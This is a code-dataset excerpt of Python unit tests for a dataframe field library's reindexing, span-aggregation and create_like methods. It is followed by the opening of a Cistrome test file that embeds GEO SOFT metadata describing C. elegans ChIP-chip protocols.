        expected_filt_values = [104, 97, 103, 103, 98, 98, 102, 102, 102, 99, 99, 99,
                                101, 101, 101, 101, 100, 100, 100, 100]
        expected_filt_data = ['h', 'a', 'gg', 'bb', 'fff', 'ccc', 'eeee', 'dddd', '']
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            f = df.create_indexed_string('foo')
            f.data.write(data)
            self.assertListEqual(expected_indices, f.indices[:].tolist())
            self.assertListEqual(expected_values, f.values[:].tolist())
            self.assertListEqual(data, f.data[:])
            # in-place reindex mutates the field and also returns it
            ff = f.apply_index(inds, in_place=True)
            self.assertListEqual(expected_filt_indices, f.indices[:].tolist())
            self.assertListEqual(expected_filt_values, f.values[:].tolist())
            self.assertListEqual(expected_filt_data, f.data[:])
            self.assertListEqual(expected_filt_indices, ff.indices[:].tolist())
            self.assertListEqual(expected_filt_values, ff.values[:].tolist())
            self.assertListEqual(expected_filt_data, ff.data[:])
            # reindex into an explicitly provided destination field
            g = f.create_like(df, 'g')
            g.data.write(data)
            fg = f.create_like(df, 'fg')
            fgr = g.apply_index(inds, fg)
            self.assertListEqual(expected_filt_indices, fg.indices[:].tolist())
            self.assertListEqual(expected_filt_values, fg.values[:].tolist())
            self.assertListEqual(expected_filt_data, fg.data[:])
            self.assertListEqual(expected_filt_indices, fgr.indices[:].tolist())
            self.assertListEqual(expected_filt_values, fgr.values[:].tolist())
            self.assertListEqual(expected_filt_data, fgr.data[:])
            # reindex with no destination returns a new field
            fh = g.apply_index(inds)
            self.assertListEqual(expected_filt_indices, fh.indices[:].tolist())
            self.assertListEqual(expected_filt_values, fh.values[:].tolist())
            self.assertListEqual(expected_filt_data, fh.data[:])
            # the in-memory field behaves identically
            mf = fields.IndexedStringMemField(s)
            mf.data.write(data)
            self.assertListEqual(expected_indices, mf.indices[:].tolist())
            self.assertListEqual(expected_values, mf.values[:].tolist())
            self.assertListEqual(data, mf.data[:])
            mf.apply_index(inds, in_place=True)
            self.assertListEqual(expected_filt_indices, mf.indices[:].tolist())
            self.assertListEqual(expected_filt_values, mf.values[:].tolist())
            self.assertListEqual(expected_filt_data, mf.data[:])
            b = df.create_indexed_string('bar')
            b.data.write(data)
            self.assertListEqual(expected_indices, b.indices[:].tolist())
            self.assertListEqual(expected_values, b.values[:].tolist())
            self.assertListEqual(data, b.data[:])
            mb = b.apply_index(inds)
            self.assertListEqual(expected_filt_indices, mb.indices[:].tolist())
            self.assertListEqual(expected_filt_values, mb.values[:].tolist())
            self.assertListEqual(expected_filt_data, mb.data[:])

    def test_fixed_string_apply_index(self):
        data = np.array([b'a', b'bb', b'ccc', b'dddd', b'eeee', b'fff', b'gg', b'h'], dtype='S4')
        indices = np.array([7, 0, 6, 1, 5, 2, 4, 3], dtype=np.int32)
        expected = [b'h', b'a', b'gg', b'bb', b'fff', b'ccc', b'eeee', b'dddd']
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            f = df.create_fixed_string('foo', 4)
            f.data.write(data)
            self.assertListEqual(data.tolist(), f.data[:].tolist())
            # in-place reindex mutates the field and also returns it
            ff = f.apply_index(indices, in_place=True)
            self.assertListEqual(expected, f.data[:].tolist())
            self.assertListEqual(expected, ff.data[:].tolist())
            # reindex into an explicitly provided destination field
            g = f.create_like(df, 'g')
            g.data.write(data)
            fg = f.create_like(df, 'fg')
            fgr = g.apply_index(indices, fg)
            self.assertListEqual(expected, fg.data[:].tolist())
            self.assertListEqual(expected, fgr.data[:].tolist())
            # reindex with no destination returns a new field
            fh = g.apply_index(indices)
            self.assertListEqual(expected, fh.data[:].tolist())
            # the in-memory field behaves identically
            mf = fields.FixedStringMemField(s, 4)
            mf.data.write(data)
            self.assertListEqual(data.tolist(), mf.data[:].tolist())
            mf.apply_index(indices, in_place=True)
            self.assertListEqual(expected, mf.data[:].tolist())
            b = df.create_fixed_string('bar', 4)
            b.data.write(data)
            self.assertListEqual(data.tolist(), b.data[:].tolist())
            mb = b.apply_index(indices)
            self.assertListEqual(expected, mb.data[:].tolist())

    def test_numeric_apply_index(self):
        data = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9], dtype='int32')
        indices = np.array([8, 0, 7, 1, 6, 2, 5, 3, 4], dtype=np.int32)
        expected = [9, 1, 8, 2, 7, 3, 6, 4, 5]
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            f = df.create_numeric('foo', 'int32')
            f.data.write(data)
            self.assertListEqual(data.tolist(), f.data[:].tolist())
            # in-place reindex mutates the field and also returns it
            ff = f.apply_index(indices, in_place=True)
            self.assertListEqual(expected, f.data[:].tolist())
            self.assertListEqual(expected, ff.data[:].tolist())
            # reindex into an explicitly provided destination field
            g = f.create_like(df, 'g')
            g.data.write(data)
            fg = f.create_like(df, 'fg')
            fgr = g.apply_index(indices, fg)
            self.assertListEqual(expected, fg.data[:].tolist())
            self.assertListEqual(expected, fgr.data[:].tolist())
            # reindex with no destination returns a new field
            fh = g.apply_index(indices)
            self.assertListEqual(expected, fh.data[:].tolist())
            # the in-memory field behaves identically
            mf = fields.NumericMemField(s, 'int32')
            mf.data.write(data)
            self.assertListEqual(data.tolist(), mf.data[:].tolist())
            mf.apply_index(indices, in_place=True)
            self.assertListEqual(expected, mf.data[:].tolist())
            b = df.create_numeric('bar', 'int32')
            b.data.write(data)
            self.assertListEqual(data.tolist(), b.data[:].tolist())
            mb = b.apply_index(indices)
            self.assertListEqual(expected, mb.data[:].tolist())

    def test_categorical_apply_index(self):
        data = np.array([0, 1, 2, 0, 1, 2, 2, 1, 0], dtype=np.int32)
        keys = {b'a': 0, b'b': 1, b'c': 2}
        indices = np.array([8, 0, 7, 1, 6, 2, 5, 3, 4], dtype=np.int32)
        expected = [0, 0, 1, 1, 2, 2, 2, 0, 1]
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            f = df.create_categorical('foo', 'int8', keys)
            f.data.write(data)
            self.assertListEqual(data.tolist(), f.data[:].tolist())
            # in-place reindex mutates the field and also returns it
            ff = f.apply_index(indices, in_place=True)
            self.assertListEqual(expected, f.data[:].tolist())
            self.assertListEqual(expected, ff.data[:].tolist())
            # reindex into an explicitly provided destination field
            g = f.create_like(df, 'g')
            g.data.write(data)
            fg = f.create_like(df, 'fg')
            fgr = g.apply_index(indices, fg)
            self.assertListEqual(expected, fg.data[:].tolist())
            self.assertListEqual(expected, fgr.data[:].tolist())
            # reindex with no destination returns a new field
            fh = g.apply_index(indices)
            self.assertListEqual(expected, fh.data[:].tolist())
            # the in-memory field behaves identically
            mf = fields.CategoricalMemField(s, 'int8', keys)
            mf.data.write(data)
            self.assertListEqual(data.tolist(), mf.data[:].tolist())
            mf.apply_index(indices, in_place=True)
            self.assertListEqual(expected, mf.data[:].tolist())
            b = df.create_categorical('bar', 'int8', keys)
            b.data.write(data)
            self.assertListEqual(data.tolist(), b.data[:].tolist())
            mb = b.apply_index(indices)
            self.assertListEqual(expected, mb.data[:].tolist())

    def test_timestamp_apply_index(self):
        from datetime import datetime as D
        from datetime import timezone
        data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc),
                D(2110, 11, 1, tzinfo=timezone.utc), D(2002, 3, 3, tzinfo=timezone.utc), D(2018, 2, 28, tzinfo=timezone.utc), D(2400, 9, 1, tzinfo=timezone.utc)]
        data = np.asarray([d.timestamp() for d in data], dtype=np.float64)
        indices = np.array([7, 0, 6, 1, 5, 2, 4, 3], dtype=np.int32)
        expected = data[indices].tolist()
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            # BUGFIX: create_timestamp takes no dtype argument; the original
            # test passed a spurious 'int32' (copy-paste from create_numeric),
            # inconsistent with every other create_timestamp call in the file.
            f = df.create_timestamp('foo')
            f.data.write(data)
            self.assertListEqual(data.tolist(), f.data[:].tolist())
            # in-place reindex mutates the field and also returns it
            ff = f.apply_index(indices, in_place=True)
            self.assertListEqual(expected, f.data[:].tolist())
            self.assertListEqual(expected, ff.data[:].tolist())
            # reindex into an explicitly provided destination field
            g = f.create_like(df, 'g')
            g.data.write(data)
            fg = f.create_like(df, 'fg')
            fgr = g.apply_index(indices, fg)
            self.assertListEqual(expected, fg.data[:].tolist())
            self.assertListEqual(expected, fgr.data[:].tolist())
            # reindex with no destination returns a new field
            fh = g.apply_index(indices)
            self.assertListEqual(expected, fh.data[:].tolist())
            # the in-memory field behaves identically
            mf = fields.TimestampMemField(s)
            mf.data.write(data)
            self.assertListEqual(data.tolist(), mf.data[:].tolist())
            mf.apply_index(indices, in_place=True)
            self.assertListEqual(expected, mf.data[:].tolist())
            b = df.create_timestamp('bar')
            b.data.write(data)
            self.assertListEqual(data.tolist(), b.data[:].tolist())
            mb = b.apply_index(indices)
            self.assertListEqual(expected, mb.data[:].tolist())
class TestFieldApplySpansCount(unittest.TestCase):
    """Tests for the apply_spans_{first,last,min,max} aggregations on fields."""

    def _test_apply_spans_src(self, spans, src_data, expected, create_fn, apply_fn):
        # Build a dataset-backed field, populate it, aggregate over the spans
        # and compare the result against `expected`.
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            fld = create_fn(df)
            fld.data.write(src_data)
            result = apply_fn(fld, spans, None)
            # Indexed fields expose data as python lists; others as ndarrays.
            actual = result.data[:] if result.indexed else result.data[:].tolist()
            self.assertListEqual(expected, actual)

    def test_indexed_string_apply_spans(self):
        spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
        src_data = ['a', 'bb', 'ccc', 'dddd', 'eeee', 'fff', 'gg', 'h']
        cases = [
            ('apply_spans_first', ['a', 'ccc', 'dddd', 'gg']),
            ('apply_spans_last', ['bb', 'ccc', 'fff', 'h']),
            ('apply_spans_min', ['a', 'ccc', 'dddd', 'gg']),
            ('apply_spans_max', ['bb', 'ccc', 'fff', 'h']),
        ]
        for op, expected in cases:
            self._test_apply_spans_src(
                spans, src_data, expected,
                lambda df: df.create_indexed_string('foo'),
                lambda f, p, d, op=op: getattr(f, op)(p, d))

    def test_fixed_string_apply_spans(self):
        spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
        src_data = [b'a1', b'a2', b'b1', b'c1', b'c2', b'c3', b'd1', b'd2']
        cases = [
            ('apply_spans_first', [b'a1', b'b1', b'c1', b'd1']),
            ('apply_spans_last', [b'a2', b'b1', b'c3', b'd2']),
            ('apply_spans_min', [b'a1', b'b1', b'c1', b'd1']),
            ('apply_spans_max', [b'a2', b'b1', b'c3', b'd2']),
        ]
        for op, expected in cases:
            self._test_apply_spans_src(
                spans, src_data, expected,
                lambda df: df.create_fixed_string('foo', 2),
                lambda f, p, d, op=op: getattr(f, op)(p, d))

    def test_numeric_apply_spans(self):
        spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
        src_data = [1, 2, 11, 21, 22, 23, 31, 32]
        cases = [
            ('apply_spans_first', [1, 11, 21, 31]),
            ('apply_spans_last', [2, 11, 23, 32]),
            ('apply_spans_min', [1, 11, 21, 31]),
            ('apply_spans_max', [2, 11, 23, 32]),
        ]
        for op, expected in cases:
            self._test_apply_spans_src(
                spans, src_data, expected,
                lambda df: df.create_numeric('foo', 'int32'),
                lambda f, p, d, op=op: getattr(f, op)(p, d))

    def test_categorical_apply_spans(self):
        spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
        src_data = [0, 1, 2, 0, 1, 2, 0, 1]
        keys = {b'a': 0, b'b': 1, b'c': 2}
        cases = [
            ('apply_spans_first', [0, 2, 0, 0]),
            ('apply_spans_last', [1, 2, 2, 1]),
            ('apply_spans_min', [0, 2, 0, 0]),
            ('apply_spans_max', [1, 2, 2, 1]),
        ]
        for op, expected in cases:
            self._test_apply_spans_src(
                spans, src_data, expected,
                lambda df: df.create_categorical('foo', 'int8', keys),
                lambda f, p, d, op=op: getattr(f, op)(p, d))

    def test_timestamp_apply_spans(self):
        spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
        from datetime import datetime as D
        from datetime import timezone
        src_data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 1, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc),
                    D(2021, 1, 1, tzinfo=timezone.utc), D(2022, 5, 18, tzinfo=timezone.utc), D(2951, 8, 17, tzinfo=timezone.utc), D(1841, 10, 11, tzinfo=timezone.utc)]
        src_data = np.asarray([d.timestamp() for d in src_data], dtype=np.float64)
        # Expected values are the per-span selections from the source array.
        cases = [
            ('apply_spans_first', src_data[[0, 2, 3, 6]].tolist()),
            ('apply_spans_last', src_data[[1, 2, 5, 7]].tolist()),
            ('apply_spans_min', src_data[[0, 2, 3, 7]].tolist()),
            ('apply_spans_max', src_data[[1, 2, 5, 6]].tolist()),
        ]
        for op, expected in cases:
            self._test_apply_spans_src(
                spans, src_data, expected,
                lambda df: df.create_timestamp('foo'),
                lambda f, p, d, op=op: getattr(f, op)(p, d))
class TestFieldCreateLike(unittest.TestCase):
    """Tests for Field.create_like: with no arguments it yields an empty
    in-memory field of the same type; with a dataframe and name it yields an
    empty dataset-backed field of the same type."""

    def test_indexed_string_field_create_like(self):
        data = ['a', 'bb', 'ccc', 'ddd']
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            src = df.create_indexed_string('foo')
            src.data.write(data)
            self.assertListEqual(data, src.data[:])
            # no args -> empty in-memory field
            mem_copy = src.create_like()
            self.assertIsInstance(mem_copy, fields.IndexedStringMemField)
            self.assertEqual(0, len(mem_copy.data))
            # dataframe + name -> empty dataset-backed field
            ds_copy = src.create_like(df, "h")
            self.assertIsInstance(ds_copy, fields.IndexedStringField)
            self.assertEqual(0, len(ds_copy.data))

    def test_fixed_string_field_create_like(self):
        data = np.asarray([b'a', b'bb', b'ccc', b'dddd'], dtype='S4')
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            src = df.create_fixed_string('foo', 4)
            src.data.write(data)
            self.assertListEqual(data.tolist(), src.data[:].tolist())
            # no args -> empty in-memory field
            mem_copy = src.create_like()
            self.assertIsInstance(mem_copy, fields.FixedStringMemField)
            self.assertEqual(0, len(mem_copy.data))
            # dataframe + name -> empty dataset-backed field
            ds_copy = src.create_like(df, "h")
            self.assertIsInstance(ds_copy, fields.FixedStringField)
            self.assertEqual(0, len(ds_copy.data))

    def test_numeric_field_create_like(self):
        data = np.asarray([1, 2, 3, 4], dtype=np.int32)
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            src = df.create_numeric('foo', 'int32')
            src.data.write(data)
            self.assertListEqual(data.tolist(), src.data[:].tolist())
            # no args -> empty in-memory field
            mem_copy = src.create_like()
            self.assertIsInstance(mem_copy, fields.NumericMemField)
            self.assertEqual(0, len(mem_copy.data))
            # dataframe + name -> empty dataset-backed field
            ds_copy = src.create_like(df, "h")
            self.assertIsInstance(ds_copy, fields.NumericField)
            self.assertEqual(0, len(ds_copy.data))

    def test_categorical_field_create_like(self):
        data = np.asarray([0, 1, 1, 0], dtype=np.int8)
        key = {b'a': 0, b'b': 1}
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            src = df.create_categorical('foo', 'int8', key)
            src.data.write(data)
            self.assertListEqual(data.tolist(), src.data[:].tolist())
            # no args -> empty in-memory field
            mem_copy = src.create_like()
            self.assertIsInstance(mem_copy, fields.CategoricalMemField)
            self.assertEqual(0, len(mem_copy.data))
            # dataframe + name -> empty dataset-backed field
            ds_copy = src.create_like(df, "h")
            self.assertIsInstance(ds_copy, fields.CategoricalField)
            self.assertEqual(0, len(ds_copy.data))

    def test_timestamp_field_create_like(self):
        from datetime import datetime as D
        from datetime import timezone
        raw = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc)]
        data = np.asarray([d.timestamp() for d in raw], dtype=np.float64)
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            src = df.create_timestamp('foo')
            src.data.write(data)
            self.assertListEqual(data.tolist(), src.data[:].tolist())
            # no args -> empty in-memory field
            mem_copy = src.create_like()
            self.assertIsInstance(mem_copy, fields.TimestampMemField)
            self.assertEqual(0, len(mem_copy.data))
            # dataframe + name -> empty dataset-backed field
            ds_copy = src.create_like(df, "h")
            self.assertIsInstance(ds_copy, fields.TimestampField)
            self.assertEqual(0, len(ds_copy.data))
class TestFieldCreateLikeWithGroups(unittest.TestCase):
    """Tests for Field.create_like when the destination is a raw h5py group
    rather than a dataframe; the result is an empty dataset-backed field."""

    def test_indexed_string_field_create_like(self):
        data = ['a', 'bb', 'ccc', 'ddd']
        bio = BytesIO()
        with h5py.File(bio, 'w') as hf:
            with session.Session() as s:
                grp = hf.create_group('df')
                src = s.create_indexed_string(grp, 'foo')
                src.data.write(data)
                self.assertListEqual(data, src.data[:])
                clone = src.create_like(grp, "g")
                self.assertIsInstance(clone, fields.IndexedStringField)
                self.assertEqual(0, len(clone.data))

    def test_fixed_string_field_create_like(self):
        data = np.asarray([b'a', b'bb', b'ccc', b'dddd'], dtype='S4')
        bio = BytesIO()
        with h5py.File(bio, 'w') as hf:
            with session.Session() as s:
                grp = hf.create_group('df')
                src = s.create_fixed_string(grp, 'foo', 4)
                src.data.write(data)
                self.assertListEqual(data.tolist(), src.data[:].tolist())
                clone = src.create_like(grp, "g")
                self.assertIsInstance(clone, fields.FixedStringField)
                self.assertEqual(0, len(clone.data))

    def test_numeric_field_create_like(self):
        data = np.asarray([1, 2, 3, 4], dtype=np.int32)
        bio = BytesIO()
        with h5py.File(bio, 'w') as hf:
            with session.Session() as s:
                grp = hf.create_group('df')
                src = s.create_numeric(grp, 'foo', 'int32')
                src.data.write(data)
                self.assertListEqual(data.tolist(), src.data[:].tolist())
                clone = src.create_like(grp, "g")
                self.assertIsInstance(clone, fields.NumericField)
                self.assertEqual(0, len(clone.data))

    def test_categorical_field_create_like(self):
        data = np.asarray([0, 1, 1, 0], dtype=np.int8)
        key = {b'a': 0, b'b': 1}
        bio = BytesIO()
        with h5py.File(bio, 'w') as hf:
            with session.Session() as s:
                grp = hf.create_group('df')
                src = s.create_categorical(grp, 'foo', 'int8', key)
                src.data.write(data)
                self.assertListEqual(data.tolist(), src.data[:].tolist())
                clone = src.create_like(grp, "g")
                self.assertIsInstance(clone, fields.CategoricalField)
                self.assertEqual(0, len(clone.data))
                # the value->key mapping is inverted on the cloned field
                self.assertDictEqual({0: b'a', 1: b'b'}, clone.keys)

    def test_timestamp_field_create_like(self):
        from datetime import datetime as D
        from datetime import timezone
        raw = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc)]
        data = np.asarray([d.timestamp() for d in raw], dtype=np.float64)
        bio = BytesIO()
        with h5py.File(bio, 'w') as hf:
            with session.Session() as s:
                grp = hf.create_group('df')
                src = s.create_timestamp(grp, 'foo')
                src.data.write(data)
                self.assertListEqual(data.tolist(), src.data[:].tolist())
                clone = src.create_like(grp, "g")
                self.assertIsInstance(clone, fields.TimestampField)
                self.assertEqual(0, len(clone.data))
| 42.126168
| 167
| 0.553078
| 7,112
| 54,090
| 4.071147
| 0.044713
| 0.116806
| 0.110037
| 0.059266
| 0.881847
| 0.857084
| 0.833115
| 0.816433
| 0.800304
| 0.795089
| 0
| 0.043783
| 0.293566
| 54,090
| 1,283
| 168
| 42.159002
| 0.713957
| 0.004419
| 0
| 0.739346
| 0
| 0
| 0.022093
| 0
| 0
| 0
| 0
| 0
| 0.224975
| 1
| 0.06442
| false
| 0
| 0.026759
| 0
| 0.103072
| 0.000991
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f557b8f9330c91130b2b8eb307c4fd14501036d
| 15,782
|
py
|
Python
|
test/CoreLib/test_FeatIO.py
|
jianTaoLiu-SWJTU2012/taolib
|
6c3d6bdbfc8d6038ce4835f6e149c0f3dba8ca4d
|
[
"BSD-3-Clause"
] | 14
|
2015-12-25T14:20:25.000Z
|
2022-01-01T07:31:56.000Z
|
test/CoreLib/test_FeatIO.py
|
jianTaoLiu-SWJTU2012/taolib
|
6c3d6bdbfc8d6038ce4835f6e149c0f3dba8ca4d
|
[
"BSD-3-Clause"
] | null | null | null |
test/CoreLib/test_FeatIO.py
|
jianTaoLiu-SWJTU2012/taolib
|
6c3d6bdbfc8d6038ce4835f6e149c0f3dba8ca4d
|
[
"BSD-3-Clause"
] | 11
|
2016-11-06T06:27:10.000Z
|
2021-06-16T16:11:01.000Z
|
#!/usr/bin/env python
from Cistrome.CoreLib.FeatIO import SOFT
import unittest
class TestSOFT(unittest.TestCase):
def setUp(self):
self.softstring = """
GEO SOFT Filed Name Protocaol Name Protocol Content
The Experiment is AB1791_H3_GLP1TS_AD_1_EVERETT
!Sample_amplification_protocol_ch1 Worm_LM-PCR_Amplification_for_ChIP-chip_v1 Worm_LM-PCR_Amplification_for_ChIP-chip_v1. ChIP DNA was amplified with a modified ligation mediated PCR (LM-PCR) protocol derived from Ren, R et al (2000) Science 290, 2306-9.
!Sample_amplification_protocol_ch2 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1. 1/3 of ChIP and 10ng of input are blunted (T4 polymerase), ligated (concentrated T4 ligase) to annealed linkers and amplified by PCR using longer oligonucleotide as a primer. Generally two rounds of amplification are used to get the amount needed for microarray. Amplified DNA is tested by q-PCR and DNA gel is run to ensure small size and lack of degradation.
!Sample_amplification_protocol_comment_ch1
!Sample_amplification_protocol_comment_ch2
!Sample_biomaterial_provider_ch1
!Sample_biomaterial_provider_ch2
!Sample_characteristics_ch1
!Sample_characteristics_ch2
!Sample_data_processing ChIP-chip_normalization_standard_MA2C_v1 ChIP-chip_normalization_standard_MA2C_v1. First, all the IP and INPUT log ratio values are read from the pairdata file. Secondly, we build GC bins for INPUT and IP based on the GC counts for every probe sequence, which means the INPUT or IP values for any probes who have the same GC counts will be put together. After that, for each GC bin, we calculate the mean for IP and INPUT data, and the covariance between this two channels. By default, the robust mean variance method is applied, which generalizes Tukeys theory of bi-weight estimation where the constant C is set to 2. At last, we adjust the log ratio values for each probe by using the mean and covariance values for their corresponding GC bins, then these values are further normalized by their mean and standard derivation. In case of replicates, when we calculate the MA2Cscore afterwards, we take the median as the score from all the replicates for all the probes within the sliding window defined by bandwidth parameter.
!Sample_description
!Sample_extract_protocol_ch1 Worm_chromatin_immunoprecipitation_vCW1 Worm_chromatin_immunoprecipitation_vCW1. 2mg extract was used for each ChIP with 5% taken as input directly into elution buffer (1% SDS in TE, 0.1M NaHCO3). Antibody was added to each IP sample and incubated overnight at 4C. Immune complexes were incubated (2hrs at 4C) with 10 ul of protein A sepharose, and washed 5 minutes each with 1.4 mL of each of the following solutions: ChIP Buffer, ChIP Buffer+500mM NaCl, ChIP Buffer+1M NaCl, LiCl solution (10mM Tris-HCl pH 8.0, 250mM LiCl, 0.5% NP-40, 0.5% sodium deoxycholate, 1mM EDTA), and 1X TE (10mM Tris-HCl pH 8.0, 1mM EDTA) and treated with 20ug RNase A for 30 minutes. Samples were then washed once with 1X TE and eluted twice with 200uL elution buffer for 15minutes. 16ul 5M NaCl was added to each sample then transferred to 65C overnight to reverse crosslinks. DNA was cleaned up with a Zymo DNA clean up kit. For a detailed protocol see http://www.modencode.org/.
!Sample_extract_protocol_ch2
!Sample_extract_protocol_comment_ch1
!Sample_extract_protocol_comment_ch2
!Sample_geo_accession
!Sample_growth_protocol_ch1 Worm_L3_growth_and_harvest_vPK1 Worm_L3_growth_and_harvest_vPK1. About 2-7 million of worms are bleached and then hatched in M9 for 24-42 hrs. About 100 embryos are seeded onto the plate to test for contamination and hatching efficiency. Remaining hatched L1 larvae are inoculated in a proper volume of liquid culture. Next day when larvae reach the L3 stage they are cleaned by M9 washes and sucrose gradient and collected by freezing in liquid nitrogen. Just before collection DIC pictures are taken and about 50ul of worms are stained for DAPI to assess the stage.
!Sample_growth_protocol_ch2 Worm_embryo_growth_and_harvest_v1 Worm_embryo_growth_and_harvest_v1. Embryos were prepared by bleaching from gravid N2 adults grown in standard S-basal media liquid culture. Live embryos were cross-linked in M9 + 2% formaldehyde for 30 minutes at room temperature followed by quenching with 125mM glycine for 5 minutes. Embryos were then washed twice with M9 Buffer and once by FA buffer (50 mM HEPES/KOH pH 7.5, 1 mM EDTA, 1% Triton X-100, 0.1 % sodium deoxycholate; 150 mM NaCl). Pellets were frozen at -80C. For a detailed protocol see http://www.modencode.org/.
!Sample_growth_protocol_comment_ch1
!Sample_growth_protocol_comment_ch2
!Sample_hyb_protocol ChIP-chip_label_hyb_nimblegen_v1 ChIP-chip_label_hyb_nimblegen_v1. DNA was labeled and hybridized to C. elegans tiling array by Roche NimbleGen according to the protocol described in chapter 3 and 4 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, Amplified IP or input DNA was either labeled with Cy5 or Cy3 in the presence of Klenow fragment. The reaction was stopped by the addition of EDTA. Labeled DNA was recovered by isopropanol precipitation, and dried. The labeled DNA was hybridized to C. elegans tiling array for 16 - 20 hours at 42?C.
!Sample_label_ch1 Cy3 Cy3
!Sample_label_ch2 Cy5 Cy5
!Sample_molecule_ch1 genomic DNA genomic DNA
!Sample_molecule_ch2 mRNA mRNA
!Sample_organism_ch1 Caenorhabditis elegans Caenorhabditis elegans
!Sample_organism_ch2 Caenorhabditis elegans Caenorhabditis elegans
!Sample_platform_id
!Sample_scan_protocol ChIP-chip_scanning_nimblegen_v1 ChIP-chip_scanning_nimblegen_v1. Array scanning and raw data extraction were performed at Roche NimbleGen, according to the protocol described in chapter 5 and 6 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, array signal was scanned by using a GenePix 4000B Scanner with associated software and saved as .tif files of the 532nm and 635nm images individually. Raw signal intensities of the images were extracted and saved as .pair files by using NimbleScan software according to the NimbleScan v2.4 User?s Guide.
!Sample_source_name_ch1
!Sample_source_name_ch2
!Sample_title AB1791_H3_GLP1TS_AD_1_EVERETT
!Sample_treatment_protocol_ch1 Worm_L3_extraction_vPK1 Worm_L3_extraction_vPK1. Worms are frozen, ground, and crosslinked for 10 minutes in 1% formaldehyde. Later, washed pellets are resuspended in FA buffer and subjected to sonication in Bioruptor (14 pulses of 30 seconds with 1 minute rests in between). Extracts are then spun down and soluble fraction is stored for quality tests and future ChIP.
!Sample_treatment_protocol_ch2 Worm_embryo_extraction_v1 Worm_embryo_extraction_v1. Embryos were resuspended in FA buffer (50 mM HEPES/KOH pH 7.5, 1 mM EDTA, 1% Triton X-100, 0.1 % sodium deoxycholate; 150 mM NaCl) + protease inhibitors (Calbiochem Cat# 539131). Using a Branson sonifier microtip, samples were sonicated on ice at the following settings: 35% amplitude, 0.9 sec on, 0.1 sec off, 12 pulses, 7 times. Cell debris was removed by centrifuging at 13,000 g for 15 minutes at 4?C and taking the supernatant. Protein concentration was determined by Bradford Assay and extracts were aliquoted at stored at -80C. For a detailed protocol see http://www.modencode.org/.
!Sample_treatment_protocol_comment_ch1
!Sample_treatment_protocol_comment_ch2
^SAMPLE AB1791_H3_GLP1TS_AD_1_EVERETT
The Experiment is AB1791_H3_N2_L3_1LM
!Sample_amplification_protocol_ch1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1. 1/3 of ChIP and 10ng of input are blunted (T4 polymerase), ligated (concentrated T4 ligase) to annealed linkers and amplified by PCR using longer oligonucleotide as a primer. Generally two rounds of amplification are used to get the amount needed for microarray. Amplified DNA is tested by q-PCR and DNA gel is run to ensure small size and lack of degradation.
!Sample_amplification_protocol_ch2 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1. 1/3 of ChIP and 10ng of input are blunted (T4 polymerase), ligated (concentrated T4 ligase) to annealed linkers and amplified by PCR using longer oligonucleotide as a primer. Generally two rounds of amplification are used to get the amount needed for microarray. Amplified DNA is tested by q-PCR and DNA gel is run to ensure small size and lack of degradation.
!Sample_amplification_protocol_comment_ch1
!Sample_amplification_protocol_comment_ch2
!Sample_antibody_name AB1791_H3 An affinity purified rabbit polyclonal antibody to H3 obtained from Abcam (H3-AB1791);used for ChIP.
!Sample_biomaterial_provider_ch1
!Sample_biomaterial_provider_ch2
!Sample_characteristics_ch1
!Sample_characteristics_ch2
